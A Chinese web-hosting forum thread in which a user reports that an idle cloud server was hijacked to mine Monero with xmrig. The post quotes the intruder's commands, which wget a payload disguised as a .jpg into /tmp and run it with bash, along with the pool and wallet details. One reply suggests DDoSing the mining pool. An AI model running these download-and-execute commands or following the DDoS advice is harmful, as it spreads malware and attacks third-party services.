利用xmrig挖矿的狗逼能不能治一治它？

laogui · 发表于 2020-11-25 03:32:28

本帖最后由 laogui 于 2020-11-25 03:35 编辑

RT
有一台吃灰的阿里云机，被人入侵了，利用xmrig挖矿
幸亏阿里云有提醒
这狗逼执行的命令代码：

wget http://iems.net.cn/file/4.jpg -O /tmp/4.sh && bash /tmp/4.sh 123

复制代码

wget http://iems.net.cn/file/config.jpg -O /root/moneroocean/config.json

复制代码

看了shell脚本和config.json文件，得到以下内容
矿池：gulf.moneroocean.stream
账号：48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF
密码：123

有没有办法治一治这种狗逼的?

栉风沐雨 · 发表于 2020-11-25 05:05:20

这个真治不了。。。除了你能追溯到他个人电脑了！

这玩意，矿池是公开的，钱包公钥你知道没卵用，也不知道谁的！

直接D他矿池吧，D死矿池，就出不来块，LOC大神多！

tir · 发表于 2020-11-25 04:30:25

不知道，不太懂挖矿

铅笔 · 发表于 2020-11-25 04:38:16

社工他github地址呗

显示全部楼层 · 发表于 2020-11-25 07:44:18

提示: 作者被禁止或删除内容自动屏蔽

		自动登录	找回密码
密码			注册

byg 该用户已被删除	发表于 2020-11-25 07:44:18 来自手机 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
byg 该用户已被删除
	回复支持反对举报

[Windows VPS] 利用xmrig挖矿的狗逼能不能治一治它？

浏览过的版块

[Windows VPS] 利用xmrig挖矿的狗 逼能不能治一治它？

浏览过的版块

[Windows VPS] 利用xmrig挖矿的狗逼能不能治一治它？